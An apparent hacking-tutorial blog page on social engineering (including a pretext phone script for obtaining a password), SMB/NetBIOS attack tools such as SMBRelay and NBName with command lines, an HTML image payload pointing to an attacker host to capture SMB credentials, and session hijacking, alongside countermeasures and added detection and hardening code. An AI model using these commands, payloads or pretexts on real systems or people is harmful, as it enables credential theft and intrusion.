WELCOME TO THE WORLD OF HACKING


Friday, April 29, 2011

Social Engineering: Art of Manipulation

Objective


  • What is Social Engineering?

  • Common Types of Attacks

  • Social Engineering by Phone

  • Dumpster Diving

  • Online Social Engineering

  • Reverse Social Engineering

  • Policies and Procedures

  • Employee Education

What is Social Engineering?


  • Social Engineering is the use of influence and persuasion to deceive people for the purpose of obtaining information or persuading the victim to perform some action.

  • Companies with authentication processes, firewalls, virtual private networks and network monitoring software are still wide open to attacks

  • An employee may unwittingly give away key information in an email, by answering questions over the phone with someone they don't know, or even by talking about a project with co-workers at a local pub after hours.

It is said that security is only as strong as the weakest link. Social engineering is the use of influence and persuasion to deceive people for the purpose of obtaining information or persuading the victim to perform some action. It need not be restricted to corporate networks alone. It does not matter if enterprises have invested in high-end infrastructure and security solutions such as complex authentication processes, firewalls, VPNs and network monitoring software. None of these devices or security measures is effective if an employee unwittingly gives away key information in an email, by answering questions over the phone with a stranger or new acquaintance, or even by bragging about a project with co-workers at a local pub after hours.
Most often, people are not even aware of the security lapse they have made, albeit inadvertently. Attackers take special interest in developing social engineering skills and can be so proficient that their victims do not even realize they have been scammed. Despite having security policies in place, organizations are compromised because this form of attack preys on the human impulse to be kind and helpful.
Attackers are always looking for new ways to access information. They make sure they know the perimeter and the people on it - security guards, receptionists and help desk workers - in order to exploit human oversight. People have been conditioned not to be overtly suspicious, so they associate certain behaviour and appearance with known entities. For instance, on seeing a man dressed in brown stacking a whole bunch of boxes in a cart, people will hold the door open because they think he is the delivery man.
Some companies list employees by title and give their phone number and email address on the corporate Web site. Alternatively, a corporation may put advertisements in the paper for high-tech workers trained on Oracle databases or UNIX servers. These little bits of information help attackers know what kind of system they are tackling. This overlaps with the reconnaissance phase.
Art of Manipulation


  • Social engineering includes the acquisition of sensitive information or inappropriate access privileges by an outsider, based upon the building of inappropriate trust relationships with outsiders.

  • The goal of a social engineer is to trick someone into providing valuable information or access to that information.

  • It preys on qualities of human nature, such as the desire to be helpful, the tendency to trust people and the fear of getting into trouble.

Social engineering is the art and science of getting people to comply with an attacker's wishes. It is not a form of mind control, and it does not allow the attacker to get people to perform tasks wildly outside their normal behaviour. Above all, it is not foolproof. Yet this is one way most attackers get a foot in the door of the corporation. There are two terms of interest here.

  • Social engineering is hacker jargon for getting needed information from a person rather than breaking into a system.

  • Psychological subversion is the term for using social engineering over an extended period of time to maintain a continuing stream of information and help from unsuspecting users.

Let us look at a sample scenario.
Attacker: "Good morning Ma'am, I am Bob; I would like to speak with Ms. Alice."
Alice: "Hello, I am Alice."
Attacker: "Good morning Ma'am, I am calling from the data center, I am sorry I am calling you so early..."
Alice: "Uh, data center office, well, I was having breakfast, but it doesn't matter."
Attacker: "I was able to call you because of the personal data form you filled in when creating your account."
Alice: "My pers... oh, yes."
Attacker: "I have to inform you that we had a mail server crash tonight, and we are trying to restore all corporate users' mail. Since you are a remote user, we are clearing your problems first."
Alice: "A crash? Is my mail lost?"
Attacker: "Oh no, Ma'am, we can restore it. But, since we are data center employees, and we are not allowed to mess with the corporate office users' mail, we need your password; otherwise we cannot take any action." (first try, probably unsuccessful)
Alice: "Er, my password? Well..."
Attacker: "Yes, I know, you have read in the license agreement that we will never ask for it, but it was written by the legal department, you know, all law stuff for compliance." (effort to gain the victim's trust)
Attacker: "Your username is AliceDxb, isn't it? Corporate sys dept gave us your username and telephone, but, as smart as they are, not the password. See, without your password nobody can access your mail, even we at the data center. But we have to restore your mail, and we need access. You can be sure we will not use your password for anything else; well, we will forget it." (smiling)
Alice: "Well, it's not so secret, my password is xxxxxx." (also smiling! It's amazing...)
Attacker: "Thank you very much, Ma'am. We will restore your mail in a few minutes."
Alice: "But no mail is lost, is it?"
Attacker: "Absolutely, Ma'am. You should not experience any problems, but do not hesitate to contact us just in case. You will find contact numbers on the Intranet."
Alice: "Thanks."
Attacker: "Goodbye."
Human Weakness


  • People are usually the weakest link in the security chain.

  • A successful defense depends on having good policies in place and educating employees to follow the policies.

  • Social Engineering is the hardest form of attack to defend against because it cannot be defended with hardware or software alone.
Social engineering concentrates on the weakest link of the computer security chain. It is often said that the only secure computer is an unplugged one. The fact that you could persuade someone to plug it in and switch it on means that even a powered-down computer is vulnerable.
Anyone with access to any part of the system, physically or electronically, is a potential security risk. Any information that can be gained may be used to social-engineer further information. This means even people not considered part of a security policy can be used to cause a security breach. Security professionals are constantly told that security through obscurity is very weak security; in the case of social engineering it is no security at all, because it is impossible to obscure the fact that humans use the system and can influence it.
Several methods can be used to steer an individual towards completing a desired task. The first and most obvious is a direct request, where the individual is simply asked to do it. Although this is the least likely to succeed, it is the easiest and most straightforward method: the individual knows exactly what is wanted of them. The second is to create a contrived situation of which the victim is simply a part. With other factors to consider beyond the bare request, the individual is far more likely to be persuaded, because the attacker can supply reasons for compliance other than purely personal ones. This involves far more work for the attacker and almost certainly requires extensive knowledge of the target. That does not mean the situation need not be based in fact: the fewer untruths, the better the chances of success.
One of the essential tools for social engineering is a good memory for gathered facts. This is something hackers and sysadmins tend to excel at, especially when it comes to facts relating to their field.

SMB Hacking Tools

SMBGrind increases the speed of L0phtCrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually. Without such filtering, password cracking is a time-consuming, laborious process unless it is targeted at particular users' passwords.
If an attacker can force a NetBIOS connection from the target, they can retrieve the authentication information of the currently logged-in user. The SMB protocol uses a challenge-response method of authentication to prevent replay attacks and complicate cracking: the challenge is eight bytes of randomly generated data, which the client encrypts using the password as the encryption key. If this exchange can be captured, the session can be hijacked as well, but this is not always easy.
SMBGrind is a tool that seeks to solve this problem and make password cracking by L0phtCrack faster. It removes duplicates and saves the filtered file to disk, so that the attacker can e-mail it directly from within SMBGrind via the File-Send menu option.
Hacking Tool: SMBDie
The SMBDie tool crashes computers running Windows 2000/XP/NT by sending a specially crafted SMB request.
SMBDie is another tool that takes advantage of a vendor's implementation of a protocol. The vulnerability results from a flaw in the way Microsoft's implementation of SMB receives a packet requesting the SMB service. Two SMB exploit programs, SMBDie and smbnuke, exploit the vulnerability in the same way.
An attacker can launch a denial of service by establishing a valid SMB session to a Windows NT/2000/XP system and then sending a specially crafted transaction packet to request the NetServerEnum2, NetServerEnum3 or NetShareEnum functions. In the SMB transaction packet, if either or both of the "Max Param Count" and "Max Data Count" values are equal to zero, the server miscalculates the length of the first buffer. This causes the next chunk in the heap to be overwritten. Once the first buffer is released, the heap is in an inconsistent state and causes a blue screen of death. The attacker can use either a user account or anonymous access to accomplish this.
Any machine on the network, including systems connected via VPN, can launch this attack. All that an attacker needs is the IP address and NetBIOS name of the target system. The attack registers an entry in the system log when it is successful but does not indicate the source of the attack. Countermeasures include blocking access to SMB ports from untrusted networks: by blocking TCP ports 445 and 139 at the network perimeter, administrators can prevent the attack from untrusted parties. Additionally, the Lanman Server service can be stopped, which prevents the attack but may not be suitable on a file and print sharing server.


Hacking Tool: NBTDeputy


  • NBTDeputy registers a NetBIOS computer name on the network and is ready to respond to NetBT name-query requests.
  • NBTDeputy helps to resolve an IP address from a NetBIOS computer name. It is similar to Proxy ARP.
  • This tool works well with SMBRelay.
  • For example, SMBRelay runs on a computer as ANONYMOUS-ONE with the IP address 192.168.1.10, and NBTDeputy is also run with 192.168.1.10 specified. SMBRelay may then connect to any XP or .NET server when logged-on users access "My Network Places".


There are certain pre-requisites for NBTdeputy to be effective. NetBIOS over TCP/IP must be disabled as NBTdeputy uses port 137 and 138. The user must specify a unique computer name on the LAN because NBTdeputy does not check for existing computer names. The user must also specify an existing Workgroup on LAN as NBTdeputy does not become the Master Browser. NBTdeputy must exist on the same LAN as the targeted XP and .Net Server machines.

NetBIOS DoS Attack
  • Sending a 'NetBIOS Name Release' message to the NetBIOS Name Service (NBNS, UDP 137) on a target NT/2000 machine forces it to place its name in conflict, so that the system will no longer be able to use it.
  • This will block the client from participating in the NetBIOS network.
  • Tool: nbname
    ◦ NBName can disable entire LANs and prevent machines from rejoining them.
    ◦ Nodes on a NetBIOS network infected by the tool will think that their names are already being used by other machines.


NetBIOS is a set of defined software interfaces for vendor-independent PC networking and is primarily used on Microsoft Windows computers. The NetBIOS Name Service (NBNS) provides a means for hostname and address mapping on a NetBIOS-aware network. In Microsoft's implementation of the NBNS Name Server (Microsoft WINS Server) they mapped group names to the single IP address 255.255.255.255 (the limited broadcast address). In order to support real group names, Microsoft modified WINS to provide support for special groups. These groups appear differently in WINS. However, since an authentication mechanism has not been defined for NetBIOS running over TCP/IP protocol, all systems running NetBIOS services are vulnerable to spoofing attacks.


For instance, an attacker can send spoofed "Name Release" or "Name Conflict" messages to a target machine and force the target machine to remove its real name from its name table (as seen with nbtstat) and not respond to other NetBIOS requests. This results in a denial of service as the legitimate machine is not able to communicate with other NetBIOS hosts.


NBName is a tool written by Sir Dystic of the Cult of the Dead Cow. It decodes and displays all NetBIOS name packets it receives on UDP port 137.


Using the /DENY * command line option it will respond negatively to all NetBIOS name registration packets it receives.


Using the /CONFLICT command line option it will send a name release request for each name that is not already in conflict to machines it receives an adapter status response from.


The /FINDALL command line option causes a wildcard name query request to be broadcast at startup and each machine that responds to the name query is sent an adapter status request.


The /ASTAT command line option causes an adapter status request to be sent to the specified IP address, which doesn't have to be on the local network.


Using /FINDALL /CONFLICT /DENY * will disable entire local NetBIOS network and prevent machines from rejoining it. Nodes on a NetBIOS network infected by the tool will think that their names already are being used.
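Everything NBName does is visible on the wire as an ordinary NBNS packet with a tell-tale opcode or return code: a name release request (what /CONFLICT sends), a negative registration response (what /DENY answers with), a name conflict demand, and the wildcard and adapter status probes behind /FINDALL and /ASTAT. The following is an added example in Python, not part of the original post and not NBName's own code, that parses RFC 1002 name-service packets, labels those patterns, and reports any source that sends too many of them. The packet builders, the sample traffic and the IP addresses are constructed for the demonstration, and the alert threshold is an assumption.

```python
"""Detect NBName-style NetBIOS Name Service abuse on UDP/137 (RFC 1001/1002).

Added example: not from the original post and not NBName's own code.
Packet builders and the sample traffic below are constructed for the demo.
"""
import socket
import struct

OPCODES = {0: "query", 5: "registration", 6: "release", 7: "wack", 8: "refresh"}
RCODES = {0: "ok", 1: "fmt_err", 2: "srv_err", 4: "imp_err", 5: "rfs_err",
          6: "act_err", 7: "cft_err"}    # 6 = name owned by another node, 7 = name in conflict
NB, NBSTAT = 0x0020, 0x0021               # question / resource record types
WILDCARD = b"*" + b"\x00" * 15            # the "*" name used by adapter status probes


def netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """Raw 16-byte NetBIOS name: 15 characters space-padded plus the suffix byte."""
    return name.upper().encode("ascii").ljust(15, b" ")[:15] + bytes([suffix])


def encode_name(raw16: bytes) -> bytes:
    """First-level encoding (RFC 1001 14.1): every nibble becomes a letter 'A'..'P'."""
    enc = bytearray()
    for b in raw16:
        enc += bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)])
    return b"\x20" + bytes(enc) + b"\x00"     # 32-byte label, then the root label


def decode_name(buf: bytes, off: int):
    """Decode the name at buf[off], following RFC 883 pointers. Returns (raw16, next_off)."""
    if buf[off] & 0xC0 == 0xC0:
        ptr = struct.unpack("!H", buf[off:off + 2])[0] & 0x3FFF
        return decode_name(buf, ptr)[0], off + 2
    if buf[off] != 32:
        raise ValueError("unexpected NetBIOS label length %d" % buf[off])
    enc = buf[off + 1:off + 33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    off += 33
    while buf[off] != 0:                      # skip scope labels, if any, up to the root label
        off += 1 + buf[off]
    return raw, off + 1


def parse_nbns(pkt: bytes) -> dict:
    """Parse the header, question entries and resource records into a small dict."""
    trn_id, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    off, names = 12, []
    for _ in range(qd):                       # QUESTION_NAME, QUESTION_TYPE, QUESTION_CLASS
        raw, off = decode_name(pkt, off)
        names.append((raw, struct.unpack("!H", pkt[off:off + 2])[0]))
        off += 4
    for _ in range(an + ns + ar):             # RR_NAME, RR_TYPE, RR_CLASS, TTL, RDLENGTH, RDATA
        raw, off = decode_name(pkt, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10 + rdlen
        names.append((raw, rtype))
    return {"id": trn_id, "response": bool(flags & 0x8000),
            "opcode": OPCODES.get((flags >> 11) & 0xF, "unknown"),
            "rcode": RCODES.get(flags & 0xF, "unknown"), "names": names}


def classify(pkt: bytes) -> str:
    """Map a packet to the NBName behaviour it matches, or 'other' for normal traffic."""
    p = parse_nbns(pkt)
    op, rc, resp = p["opcode"], p["rcode"], p["response"]
    if op == "release" and not resp:
        return "name-release-request"             # what /CONFLICT sends to victims
    if op == "registration" and resp and rc == "cft_err":
        return "name-conflict-demand"
    if op == "registration" and resp and rc in ("act_err", "rfs_err"):
        return "negative-registration-response"   # what /DENY answers registrations with
    if op == "query" and not resp:
        if any(t == NBSTAT for _, t in p["names"]):
            return "adapter-status-request"       # /ASTAT, and the follow-up step of /FINDALL
        if any(raw == WILDCARD for raw, _ in p["names"]):
            return "wildcard-name-query"          # the /FINDALL broadcast
    return "other"


def suspicious_sources(traffic, threshold: int = 3) -> dict:
    """Sources that sent at least `threshold` abuse-pattern packets (threshold is an assumption)."""
    seen = {}
    for src, pkt in traffic:
        kind = classify(pkt)
        if kind != "other":
            seen.setdefault(src, []).append(kind)
    return {src: kinds for src, kinds in seen.items() if len(kinds) >= threshold}


# Packet builders, used only to construct the sample traffic.
def build_name_query(trn_id, raw16, qtype):
    hdr = struct.pack("!HHHHHH", trn_id, 0x0110, 1, 0, 0, 0)      # opcode query, RD + B flags
    return hdr + encode_name(raw16) + struct.pack("!HH", qtype, 1)


def build_release_request(trn_id, raw16, ip):
    hdr = struct.pack("!HHHHHH", trn_id, 6 << 11, 1, 0, 0, 1)     # opcode release, 1 question, 1 additional
    q = encode_name(raw16) + struct.pack("!HH", NB, 1)
    rr = b"\xC0\x0C" + struct.pack("!HHIH", NB, 1, 0, 6) + b"\x00\x00" + socket.inet_aton(ip)
    return hdr + q + rr


def build_negative_registration_response(trn_id, raw16, rcode=6):
    flags = 0x8000 | (5 << 11) | 0x0400 | rcode                   # response, registration, AA, rcode
    hdr = struct.pack("!HHHHHH", trn_id, flags, 0, 1, 0, 0)
    rr = encode_name(raw16) + struct.pack("!HHIH", NB, 1, 0, 6) + b"\x00\x00" + socket.inet_aton("0.0.0.0")
    return hdr + rr


SAMPLE_TRAFFIC = [                                                # constructed: host .10 behaves like NBName
    ("192.168.1.10", build_name_query(0x1001, WILDCARD, NB)),
    ("192.168.1.10", build_name_query(0x1002, WILDCARD, NBSTAT)),
    ("192.168.1.10", build_release_request(0x1003, netbios_name("FILESRV"), "192.168.1.20")),
    ("192.168.1.10", build_negative_registration_response(0x1004, netbios_name("WKS01"))),
    ("192.168.1.10", build_negative_registration_response(0x1005, netbios_name("WKS02"), rcode=7)),
    ("192.168.1.20", build_name_query(0x2001, netbios_name("FILESRV"), NB)),   # an ordinary lookup
]

if __name__ == "__main__":
    for src, pkt in SAMPLE_TRAFFIC:
        print(src, classify(pkt))
    print("suspicious:", suspicious_sources(SAMPLE_TRAFFIC))
```

In production the packets would come from a sniffer on UDP 137 rather than from the builders; a single negative registration response is normal when two hosts genuinely pick the same name, which is why the detector counts per source instead of alerting on the first packet.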

SMBRelay man-in-the-middle Scenario

  • The attacker in this setting sets up a fraudulent server at 192.168.234.251, a relay address of 192.168.234.252 using /R, and a target server address of 192.168.234.34 with /T.
c:\> smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34
  • When a victim client connects to the fraudulent server thinking it is talking to the target, the MITM server intercepts the call, hashes the password and passes the connection to the target server.

SMBRelay can also be used for session hijacking. The attacker can pose as the "man in the middle" by virtually interposing himself between the client and host. SMBRelay is the first widely distributed hack tool that automates the man-in-the-middle (MITM) attack. SMBRelay automates the process by functioning first as a data relay between the client and host, sending on all but the authentication data.
The attacker can send a client of the targeted host an HTML e-mail message with a link to a NetBIOS share on the web server. As the target's computer attempts to establish a NetBIOS connection, the attacker steps in, intercepts the client's credentials, and passes them off as his own.
Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.
For example, set up a MITM server at 192.168.200.114 using the /L+ switch, a relay address of 192.168.200.252 using the /R and a target server address of 192.168.200.168 with the /T switch:
c:\>smbrelay /IL /IR 2 192.168.200.252 /T 192.168.200.168
A victim client, 192.168.200.120, is then coaxed into connecting to the fraudulent MITM server by deception.

This brings us to SMBRelay2, which works at the NetBIOS level, and should work across any protocol NetBIOS is bound to (such as NetBEUI or TCP/IP). The difference is that instead of using IP addresses, SMBRelay2 uses NetBIOS names. Moreover, it supports man in the middle attack to a third host. However, the limitation of this utility is that currently it supports listening on only one name, so the target must attempt to connect to that name for SMBRelay2 to operate (the local name).

SMBRelay Weakness and Countermeasures

  • The problem is to convince a victim's client to authenticate to the MITM server.
  • You can send a malicious e-mail message to the victim client with an embedded hyperlink to the SMBRelay server's IP address.
  • Another solution is an ARP poisoning attack against the entire segment, causing all of the systems on the segment to authenticate through the fraudulent MITM server.

Countermeasures

  • Configure Windows 2000 to use SMB signing.
  • Client and server communication will then cryptographically sign each block of SMB communications.
  • These settings are found under Security Policies / Security Options.


There are inherent weaknesses in executing a SMBRelay attack. The hindrances to this attack are pointers towards countermeasures to be adopted. Firstly SMBRelay must be able to bind to port 139 to receive the incoming NetBIOS connections. This requires administrative privileges as this is a port number less than 1024.


SMBRelay targets and runs best on Windows NT and 2000 machines; connections from 9x and ME boxes will have unpredictable results. Moreover, it relies on the attacker's ability to convince the user to authenticate to the MITM server. Ways to overcome this include sending the victim a malicious email with an embedded hyperlink to the MITM server's IP address.
Another is an ARP poisoning attack against the entire segment, causing all of the systems on the segment to authenticate through the fraudulent MITM server. ARP traffic can easily be spoofed to reroute traffic originating from a system to the attacker's system, even in a switched environment. Rerouted traffic can be viewed with a network packet analyzer and then forwarded to the real destination in a variant of the MITM attack.
The only real prevention against SMBRelay is to dismantle all SMB communications and to use Windows 2000 Kerberos authentication only in a native, single forest environment network (with no legacy clients) and with all applications supporting Kerberos.


Another countermeasure, as discussed earlier in the context of SMBRelay MITM, is to force the requirement for digitally signed SMB communications under Security Policy / Local Policies / Security Options. Though this may result in connectivity issues with NT4 systems, it can ensure adequate protection.


While considering countermeasures, disabling NetBIOS alone is not sufficient to prevent SMB communication. This is because in the absence of standard NetBIOS ports, SMB will use Transmission Control Protocol (TCP) port 445, which is referred to as SMB Direct Host or the Common Internet File System (CIFS) port. As a result, explicit steps must be taken to disable both NetBIOS and SMB separately.


NetBIOS uses the following ports: UDP/137 (NetBIOS name service), UDP/138 (NetBIOS datagram service) and TCP/139 (NetBIOS session service). SMB uses the following ports: TCP/139, TCP/445. On servers accessible from the Internet, SMB must be disabled by removing File and Printer Sharing for Microsoft Networks and Client for Microsoft Networks using the Transmission Control Protocol/Internet Protocol (TCP/IP) properties dialog box in the Local Area Connection properties dialog box.

Redirecting SMB Logon to the Attacker

•Eavesdropping on LM responses becomes much easier if the attacker can trick the victim to attempt Windows authentication of the attacker's choice.
•Basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server.
•When the hyperlink is clicked, the user unwittingly sends his credentials over the network.
SMB stands for Server Message Block and is a protocol for sharing files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers. SMB is a client-server, request-response protocol. Normally, after clients have connected to servers using TCP/IP, NetBEUI or IPX/SPX, they can send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and perform other file operations. The exposure is that in the case of SMB all of this, authentication included, is done over the network. SMB has been seen used over TCP/IP, NetBEUI, IPX/SPX, NetBIOS etc.

The SMB model defines two levels of security. The primary protection is applied at the share level on a server: each share can have a password, and a client only needs that password to access all files under that share. This was the first security model SMB had. The second security level is at the user level: protection is applied to individual files in each share and is based on user access rights. Every client wishing to access resources must log in to the server and authenticate itself. Once authenticated, the client is given a UID, which is to be presented on all subsequent accesses to the server. This model has been available since LAN Manager 1.0.
While SMB password guessing is still the most effective method for gaining access to Windows systems, an unsuccessful attacker might attempt to eavesdrop on SMB logon exchanges using sniffing techniques. This may be done directly off the network using tools such as L0phtCrack's SMBCapture. SMBCapture is capable of sniffing Windows NT/2000 challenge-response authentication traffic off the network and feeding it into the L0phtCrack cracking engine.

As an example, the following code, submitted in an email and embedded in HTML brackets, will show nothing in the email, but when the null gif is loaded by the victim's Internet Explorer the victim will automatically initiate an SMB session with attacker_server:

img src=file://attacker_server/null.gif height=1 width=1

SMBCapture will be listening on attacker_server or its local segment, and the LM challenge-response will be extracted. It is also possible to use ARP redirection/cache poisoning to redirect client traffic to a designated system.
Countermeasures include:
•Using Windows 2000 Kerberos authentication only in a native, single forest environment network (no legacy clients) with all applications supporting Kerberos;
•Ensuring physical security best practices; Ensuring that network access points are inaccessible to passersby;
•Setting LAN Manager Authentication Level to "Send NTLM responses only". The NTLM response is not susceptible to SMBCapture attack; SMBCapture will maintain it is capturing but, when sent to Lophtcrack, the hashes will not crack within a reasonable time frame.
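The countermeasures listed above and in the SMBRelay section (required SMB signing, disabling NetBIOS over TCP/IP as well as SMB, and the LAN Manager authentication level) all live in the registry, so a defender can audit them instead of assuming they were set. Here is an added example in Python, not from the original post, that checks the server- and client-side RequireSecuritySignature values, the per-interface NetbiosOptions value, and LmCompatibilityLevel (the "Send NTLM responses only" setting above is level 2; level 5 refuses LM and NTLM entirely and is what a current deployment should aim for). On Windows it reads the live registry through the standard winreg module; elsewhere it evaluates two constructed snapshots. The registry paths and value names are the real ones; the interface GUID is a placeholder.

```python
"""Audit the Windows settings the page relies on as countermeasures: NetBIOS over
TCP/IP disabled per interface, SMB signing required on server and client, and an
LM authentication level that no longer sends LM responses.

Added example, not from the original post. Registry paths and value names are the
real ones; the two snapshots at the bottom are constructed for the demonstration.
"""
import sys

LSA = r"SYSTEM\CurrentControlSet\Control\Lsa"
SRV = r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
WKS = r"SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters"
NETBT = r"SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces"

LM_LEVELS = {
    0: "Send LM & NTLM responses",
    1: "Send LM & NTLM - use NTLMv2 session security if negotiated",
    2: "Send NTLM response only",
    3: "Send NTLMv2 response only",
    4: "Send NTLMv2 response only, refuse LM",
    5: "Send NTLMv2 response only, refuse LM & NTLM",
}


def assess(snapshot: dict) -> list:
    """Return one finding per weak setting. `snapshot` maps key path -> {value: data};
    the NETBT entry maps interface subkey name -> {value: data}."""
    findings = []
    level = snapshot.get(LSA, {}).get("LmCompatibilityLevel", 0)   # an absent value behaves like 0
    if level < 2:
        findings.append("LmCompatibilityLevel=%d (%s): the LM response is sent and can be captured "
                        "with SMBCapture and cracked; set 2 at minimum, 5 where clients allow it"
                        % (level, LM_LEVELS.get(level, "?")))
    for path, role in ((SRV, "server"), (WKS, "client")):
        if snapshot.get(path, {}).get("RequireSecuritySignature", 0) != 1:
            findings.append("%s: RequireSecuritySignature is not 1, so unsigned SMB sessions are "
                            "accepted and an SMBRelay-style relay is not rejected" % role)
    for iface, values in snapshot.get(NETBT, {}).items():
        if values.get("NetbiosOptions", 0) != 2:                     # 0 = DHCP decides, 1 = on, 2 = off
            findings.append("%s: NetbiosOptions != 2, NetBIOS over TCP/IP (UDP 137/138, TCP 139) is "
                            "still enabled; SMB itself still listens on TCP 445 regardless" % iface)
    return findings


def read_live() -> dict:
    """Collect the same values from the local registry (Windows only, via winreg)."""
    import winreg

    def values(path):
        out, i = {}, 0
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, i)
                except OSError:           # no more values under this key
                    return out
                out[name] = data
                i += 1

    snap = {}
    for path in (LSA, SRV, WKS):
        try:
            snap[path] = values(path)
        except OSError:
            pass
    snap[NETBT] = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, NETBT) as key:
            for i in range(winreg.QueryInfoKey(key)[0]):
                sub = winreg.EnumKey(key, i)
                snap[NETBT][sub] = values(NETBT + "\\" + sub)
    except OSError:
        pass
    return snap


# Constructed snapshots: a Windows 2000 style default beside the hardened target state.
WEAK = {LSA: {"LmCompatibilityLevel": 0}, SRV: {"RequireSecuritySignature": 0},
        WKS: {"EnableSecuritySignature": 1},
        NETBT: {"Tcpip_{PLACEHOLDER-GUID}": {"NetbiosOptions": 0}}}
HARDENED = {LSA: {"LmCompatibilityLevel": 5}, SRV: {"RequireSecuritySignature": 1},
            WKS: {"RequireSecuritySignature": 1},
            NETBT: {"Tcpip_{PLACEHOLDER-GUID}": {"NetbiosOptions": 2}}}

if __name__ == "__main__":
    snap = read_live() if sys.platform == "win32" else WEAK
    for finding in assess(snap) or ["no weak settings found"]:
        print("-", finding)
```

Requiring signing on the server side is what actually stops a relayed session from being accepted; enabling it on the client alone only means the client offers to sign, which is why the check insists on RequireSecuritySignature rather than EnableSecuritySignature.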

SMB Hacking Tools - SMB Relay

  • SMBRelay is essentially an SMB server that can capture usernames and password hashes from incoming SMB traffic.
  • It can also perform man-in-the-middle (MITM) attacks.
  • You must disable NetBIOS over TCP/IP and block ports 139 and 445.
  • Start the SMBRelay server and listen for SMB packets:
c:\>smbrelay /e
c:\>smbrelay /IL 2 /IR 2
  • An attacker can access the client machine by simply connecting to it via the relay address using:
c:\>net use * \\\c$
SMBRelay by Sir Dystic of the Cult of the Dead Cow is essentially an SMB server that receives a connection on port 139, connects back to the connecting computer's port 139 or to another target server, and relays the packets between the client and server of the connecting Windows machine, modifying these packets when necessary.
SMBRelay functions first as a data relay between the client and host, sending on all but the authentication data. Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.
The usage is smbrelay [options]
Options:

  • /D num - Set debug level; current valid levels: 0 (none), 1, 2. Defaults to 0.
  • /E - Enumerates interfaces and their indexes.
  • /F[-] - Fake server only: capture password hashes and do not relay. Use - to disable acting as a fake server if relay fails.
  • /IL num - Set the interface index to use when adding local IP addresses.
  • /IR num - Set the interface index to use when adding relay IP addresses. Defaults to 1.
  • /L[+] IP - Set the local IP to listen on for incoming NetBIOS connections. Use + to first add the IP address to the NIC. Defaults to the primary host IP.
  • /R[-] IP - Set the starting relay IP address to use. Use - to not add each relay IP address to the NIC. Defaults to 192.1.1.1 first.
  • /S name - Set the source machine name.


The attacker can choose to disable TCP port 445 on the rogue server using an IPSec filter so that traffic will always flow through TCP port 139. The server can then capture both LM and NTLM passwords and write them to its working directory as hashes.txt, which can later be imported into L0phtCrack. Furthermore, the attacker's system can now access the client machine by simply connecting to it via the relay address:
c:\>net use * \\192.x.x.x\c$
On the client side (W2K), the "net use" command will fail to turn up any sessions, as the program throws system error 64 and indicates that no drives are mounted. However, running "net session" will reveal that it is connected to the spoofed machine name, CDC4EVER, which SMBRelay sets by default unless changed using the "/S name" parameter.

How to hack online Sessions : Session Hijacking

Hello friends, from now onwards we will explore the most advanced hacking techniques. One of them is Session Hijacking. In today's tutorial we will discuss how to hack online sessions using Session Hijacking. In today's hacking class I will explain the basics of Session Hijacking: what session hijacking is, the different types of Session Hijacking attacks and the different methods used to hijack sessions. In my next tutorial, tomorrow, I will explain in detail how to hijack sessions and what tools you will need to hijack active sessions. So friends, read on...


How Session Hijacking works

What is Session Hijacking?
Let's discuss this in common terms. Session Hijacking, as the name suggests, means hijacking someone's active session and trying to exploit it by taking unauthorized access to their computer system or network. So Session Hijacking is the exploitation of a valid computer or network session. Sometimes technical guys also call this HTTP cookie theft or, more correctly, Magic Cookie hacking. Now you guys are surely thinking: what is a Magic Cookie?
A magic cookie is simply a cookie that is used to authenticate the user on a remote server or, simply, a computer. In general, cookies are used to maintain sessions on websites and store the remote address of the website. So in Session Hijacking what the hacker does is try to steal the magic cookies of the active session; that's why it's called HTTP cookie theft. Nowadays several websites have started using HTTPS cookies, simply called encrypted cookies. But we all know that if an encrypter exists, so does its decrypter :P..


Session Hijacking is the process of taking over an existing active session. One of the main reasons for hijacking a session is to bypass the authentication process and gain access to the machine. Since the session is already active there is no need to re-authenticate, and the hacker can easily access resources and sensitive information like passwords, bank details and much more.


Different Types of Session Hijacking
Session Hijacking involves two types of attacks :
1. Active attack
2. Passive attack


In a passive attack, the hacker hijacks a session but just sits back, watches and records all the traffic that is being sent from or received by the computer. This is useful for finding sensitive information like usernames and passwords for websites, Windows and much more...


In an active attack, the hacker finds the active session and takes it over. This is done by forcing one of the parties offline, which is usually achieved by a DDoS attack (Distributed Denial of Service attack). Now the hacker takes control of the active session and executes commands on the system that either give him sensitive information such as passwords or allow him to log in at a later time.
There are also some hybrid attacks, where the attacker watches a session for a while and then becomes active by taking it over. Another way is to watch the session and periodically inject data into the active session without actually taking it over.


Methods to Hijack Sessions
There are four main methods used to perpetrate a session hijack. These are:

  • Session fixation, where the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.
  • Session sidejacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows him to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point.
  • Alternatively, an attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user's computer or the server.
